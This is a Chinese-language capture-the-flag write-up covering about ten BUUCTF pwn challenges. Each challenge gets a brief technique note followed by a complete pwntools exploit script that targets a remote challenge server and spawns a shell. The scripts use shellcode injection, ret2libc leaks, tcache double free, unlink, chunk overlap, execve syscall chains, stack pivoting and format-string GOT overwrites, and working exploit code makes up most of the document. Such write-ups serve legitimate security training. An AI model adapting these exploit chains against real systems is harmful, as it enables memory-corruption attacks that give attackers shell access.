BUUCTF-pwn(10)
picoctf_2018_shellcode
题目很很简单!
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './PicoCTF_2018_shellcode'
r = remote('node4.buuoj.cn',25585)
#r = process(binary)
elf = ELF(binary)
shellcode = asm(shellcraft.sh())
r.recvuntil("Enter a string!\n")
r.sendline(shellcode)
r.interactive()
jarvisoj_level5
简单的64为栈溢出漏洞,利用万能gadget (__libc_csu_init) 达成泄露攻击利用!
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')
binary = './level3_x64'
r = remote('node4.buuoj.cn',29495)
#r = process(binary)
elf = ELF(binary)
write_plt = elf.plt['write']
write_got = elf.got['write']
start_addr = 0x04004F0
pop_rdi_ret = 0x04006b3
one1 = 0x04006AA
one2 = 0x0400690
#gdb.attach(r)
r.recvuntil("Input:\n")
payload = b'a'*0x88+p64(one1)+p64(0)+p64(1)+p64(write_got)+p64(0x8)+p64(write_got)+p64(1)
payload += p64(one2)+p64(0)*7+p64(start_addr)
r.sendline(payload)
write_addr = u64(r.recv(8))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr-libc.dump('write')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("write_addr -> "+hex(write_addr))
log.info("libc_base -> "+hex(libc_base))
r.recvuntil("Input:\n")
payload2 = b'a'*0x88+p64(pop_rdi_ret)+p64(sh)+p64(system)
r.sendline(payload2)
r.interactive()
ciscn_2019_final_3
分析main函数!
主要为add申请函数与remove删除函数!
该题libc为2.27,存在tcache,故采用tcache attach,我们可以连续free同一chunk,造成double chunk, libc2.29之后对tcache的double free有所检测。 此时我们首先可以计算出tcache chunk所在地址,利用double free,可以修改0x100大小chunk的count为8,表示tcache已满,故此时free(0x100),会存放到unsorted bin中。此时再次采用double free,可泄露出main_arena,从而得到system函数地址,然后采用double free修改free_hook为system函数,此时free("/bin/sh"),即执行system("/bin/sh")
from pwn import *
from pwnlib.term.readline import go_beginning
from six import indexbytes
context(log_level='debug',os='linux',arch='amd64')
binary = './ciscn_final_3'
r = remote('node4.buuoj.cn',29885)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc.so.6')
index = 0
bss = []
def Allocate(size=0x10,payload='\n'):
global index
print(index)
r.sendlineafter("choice > ",'1')
r.sendlineafter("input the index",str(index))
index += 1
r.sendlineafter("input the size",str(size))
r.sendafter("now you can write something",payload)
r.recvuntil("gift :0x")
bss.append(int(r.recvuntil('\n')[:-1],16))
def Free(index):
r.sendlineafter("choice > ",'2')
r.sendlineafter("input the index",str(index))
Allocate(0x50)#0
Allocate(0x70,b'/bin/sh\x00')#1
Allocate(0x70,b'/bin/sh\x00')#2
Allocate(0x10,b'/bin/sh\x00')#3
Free(0)
Free(0)
Allocate(0x50,p64(bss[0]-0x11E60))#4
Allocate(0x50)#5
Allocate(0x50,b'\x00'*14+b'\x08\x00'+p64(0)*6+p64(bss[1]-0x10))#6
Allocate(0x10,p64(0)+p64(0x101))#7
Free(1)#1
Allocate(0x30)#8
Free(8)
Free(8)
Allocate(0x30,p64(bss[8]+0x40))#9
Allocate(0x30)#10
Allocate(0x30)#11
Allocate(0x30)#12
main_arena = bss[12]-96
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3EBC40
system = libc_base+libc.symbols['system']#+0x4F440
free_hook = libc_base+libc.symbols['__free_hook']#+0x3ED8E8
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
Allocate(0x70)#13
Free(0)
Free(0)
Allocate(0x50,p64(free_hook))#14
Allocate(0x50)#15
Allocate(0x50,p64(system))#16
#gdb.attach(r)
Free(2)
r.interactive()
cmcc_pwnme2
简单的栈溢出漏洞,唯一需要注意的是远程ebp需要设置为一个具体数值,本地无需!
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='i386')
binary = './pwnme2'
r = remote('node4.buuoj.cn',26425)
#r = process(binary)
elf = ELF(binary)
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
ret = 0x080483f2
#gdb.attach(r)
r.recvuntil("Please input:\n")
payload = b'a'*(0x6c+0x4)+p32(puts_plt)+p32(main)+p32(puts_got)
r.sendline(payload)
r.recvline()
puts_addr = u32(r.recv(4))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("puts_addr -> "+hex(puts_addr))
log.info("libc_base -> "+hex(libc_base))
#gdb.attach(r)
sleep(0.1)
payload2 = b'b'*(0x6c)+p32(main)+p32(system)+p32(sh)+p32(sh)
r.sendline(payload2)
r.interactive()
picoctf_2018_can_you_gets_me
同样为简单的栈溢出漏洞,不过本题为静态链接。且无system与"/bin/sh",但是存在int 0x80h,故为32为SROP,此时我们设置read到bss段上"/bin/sh\x00",此时调用execve(调用号11),进而可获取权限!
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './PicoCTF_2018_can-you-gets-me'
r = remote('node4.buuoj.cn',27856)
#r = process(binary)
elf = ELF(binary)
main = elf.symbols['main']
read_addr = elf.symbols['read']
int80 = 0x0806cc25
pop_eax_ret = 0x080b81c6
pop_edx_ecx_ebx_ret = 0x0806f050# : pop edx ; pop ecx ; pop ebx ; ret
bss_addr = 0x080EAF80
r.recvuntil("GIVE ME YOUR NAME!\n")
payload = b'a'*(0x18+0x4)+p32(read_addr)+p32(main)+p32(0)+p32(bss_addr)+p32(0x8)
r.sendline(payload)
sleep(0.1)
r.send(b'/bin/sh\x00')
r.recvuntil("GIVE ME YOUR NAME!\n")
payload2 = b'a'*(0x18+0x4)+p32(pop_eax_ret)+p32(11)+p32(pop_edx_ecx_ebx_ret)
payload2 += p32(0)*2+p32(bss_addr)+p32(int80)
r.sendline(payload2)
r.interactive()
npuctf_2020_easyheap
分析主要函数!
Allocate申请函数!
Edit编辑函数
Show打印函数
Free释放函数
该题目的libc为2.27,存在tcache,且申请大小固定在0x18与0x38,故我们可以修改chunk的size大小由0x18到0x38,故此时申请0x38,便可以得到下面的重叠的0x18大小的chunk区域,此时我们可以修改重叠chunk的执行位置到free_got,从而泄露出libc地址,进而更改free_got地址为system函数地址。故可以获取权限。
from inspect import FrameInfo
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')
binary = './npuctf_2020_easyheap'
r = remote('node4.buuoj.cn',27881)
#r = process(binary)
elf = ELF(binary)
free_got = elf.got['free']
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("Your choice :",'1')
r.sendlineafter("Size of Heap(0x10 or 0x20 only) : ",str(size))
r.sendafter("Content:",payload)
def Edit(index,payload='\n'):
r.sendlineafter("Your choice :",'2')
r.sendlineafter("Index :",str(index))
r.sendlineafter("Content: ",payload)
def Show(index):
r.sendlineafter("Your choice :",'3')
r.sendlineafter("Index :",str(index))
def Free(index):
r.sendlineafter("Your choice :",'4')
r.sendlineafter("Index :",str(index))
Allocate()#0
Allocate()#1
Allocate(0x18,b'/bin/sh\x00')#2
Edit(0,b'a'*0x18+p8(0x41))
Free(1)#1
Allocate(0x38)#1
Edit(1,b'a'*0x18+p64(0x21)+p64(0x38)+p64(free_got))
Show(1)
r.recvuntil("Content : ")
free_addr = u64(r.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher('free',free_addr)
libc_base = free_addr-libc.dump('free')
system = libc_base+libc.dump('system')
log.info("free_addr -> "+hex(free_addr))
log.info("libc_base -> "+hex(libc_base))
Edit(1,p64(system))
Free(2)
#gdb.attach(r)
r.interactive()
hitcontraining_bamboobox
分析主要函数!
经典菜单堆溢出题目!libc为2.23!
此处最后一位置零0,而Show打印函数遇0会发生截断!
存在堆溢出漏洞!
本题目采用Unlink,修改bss段上全局变量,从而可以修改bss段上任意数据,从而达成任意地址读,任意地址写!此时我们往free_got写入system函数地址。
注意 puts_got位于free_got下方,修改free_got内容是防止修改掉puts_got,从而导致menu函数无法执行,此时便无法获取权限
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')
binary = './bamboobox'
r = remote('node4.buuoj.cn',28635)
#r = process(binary)
elf = ELF(binary)
free_got = elf.got['free']
bss_addr = 0x06020C0
def Show():
r.sendlineafter("Your choice:",'1')
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("Your choice:",'2')
r.sendlineafter("Please enter the length of item name:",str(size))
r.sendafter("Please enter the name of item:",payload)
def Edit(index,payload):
r.sendlineafter("Your choice:",'3')
r.sendlineafter("Please enter the index of item:",str(index))
r.sendlineafter("Please enter the length of item name:",str(len(payload)-1))
r.sendafter("Please enter the new name of the item:",payload)
def Free(index):
r.sendlineafter("Your choice:",'4')
r.sendlineafter("Please enter the index of item:",str(index))
def Exit():
r.sendlineafter("Your choice:",'5')
Allocate(0x80)#0
Allocate(0x80)#1
Allocate(0x18,b'/bin/sh\x00')#2
target = bss_addr+0x8
fd = target-0x10
bk = target-0x18
Edit(0,p64(0)+p64(0x81)+p64(bk)+p64(fd)+p64(0)*12+p64(0x80)+p64(0x90))
Free(1)
#gdb.attach(r)
Edit(0,p64(0)*3+p64(bss_addr-0x10)+p64(0x80)+p64(free_got))
Show()
r.recvuntil("1 : ")
free_addr = u64(r.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher('free',free_addr)
libc_base = free_addr-libc.dump('free')
system = libc_base+libc.dump('system')
log.info("bss_addr -> "+hex(bss_addr))
log.info("free_addr -> "+hex(free_addr))
log.info("system -> "+hex(system))
Edit(1,p64(system))
#gdb.attach(r)
Allocate()#使num+1,从而可以执行Free函数
Free(2)
r.interactive()
picoctf_2018_got_shell
存在一次任意地址写,且有后门函数,故可将puts_got1写为win函数地址(后门)
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './PicoCTF_2018_got-shell'
r = remote('node4.buuoj.cn',28288)
#r = process(binary)
elf = ELF(binary)
r.recvuntil("byte value?\n")
r.sendline(str(hex(elf.got['puts'])))
r.recvline()
r.sendline(str(hex(0x0804854B)))
r.interactive()
actf_2019_babystack
该题目为ret2libc,通过栈迁移进行泄露,并通过栈迁移手法获取权限!
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')
binary = './ACTF_2019_babystack'
r = remote('node4.buuoj.cn',26318)
#r = process(binary)
elf = ELF(binary)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0400ad3
leave_ret = 0x0400a18
ret = 0x0400709
start_addr = 0x0400800
r.sendlineafter(">",str(0xe0))
r.recvuntil("0x")
stack_addr = int(r.recv(12),16)
log.info("stack_addr -> "+hex(stack_addr))
r.recvuntil(">")
#gdb.attach(r)
payload = b'a'*8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(0x04008F6)
payload = payload.ljust(0xd0,b'b')+p64(stack_addr)+p64(leave_ret)
r.send(payload)
r.recvuntil("Byebye~\n")
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("puts_addr -> "+hex(puts_addr))
log.info("libc_base -> "+hex(libc_base))
r.sendlineafter(">",str(0xe0))
r.recvuntil("0x")
new_stack_addr = int(r.recv(12),16)
r.recvuntil(">")
payload2 = b'c'*8+p64(ret)+p64(pop_rdi_ret)+p64(sh)+p64(system)
payload2 = payload2.ljust(0xd0,b'd')+p64(new_stack_addr)+p64(leave_ret)
r.send(payload2)
r.interactive()
wdb_2018_2nd_easyfmt
发现为格式化字符串漏洞,且可以循环利用,但不存在退出,故return,修改eip等方法则无法执行,但可以修改printf_got为system函数地址,此时传入"/bin/sh\x00"即可获取权限!
唯一需要注意的时,使用FmtStr获取偏移量时,本地大概率可以不报错,但是远程会报错!且需要仔细比对本地libc与远程libc的差别!
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './wdb_2018_2nd_easyfmt'
r = remote('node4.buuoj.cn',28433)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
printf_got = elf.got['printf']
def leak(payload):
r.sendline(payload)
return r.recv()
#fmt = FmtStr(leak)
offset = 6#fmt.offset
r.send(b'c'*0x58+b'd'*4)
r.recvuntil(b'dddd')
stack_addr = u32(r.recv(4))-0xac
r.send(b'%37$p')
r.recvuntil("0x")
libc_base = int(r.recv(8),16)-0x01b0000#libc.symbols['_GLOBAL_OFFSET_TABLE_']#-0x1B2000
system = libc_base+libc.symbols['system']#+0x3AD80
sh = libc_base+0x15BA3F
log.info("offset -> "+hex(offset))
log.info("ebp_addr -> "+hex(stack_addr))
log.info("libc_base -> "+hex(libc_base))
#gdb.attach(r)
payload = fmtstr_payload(offset,{printf_got:system})
r.send(payload)
sleep(0.1)
r.send(b'/bin/sh\x00')
#gdb.attach(r)
r.interactive()
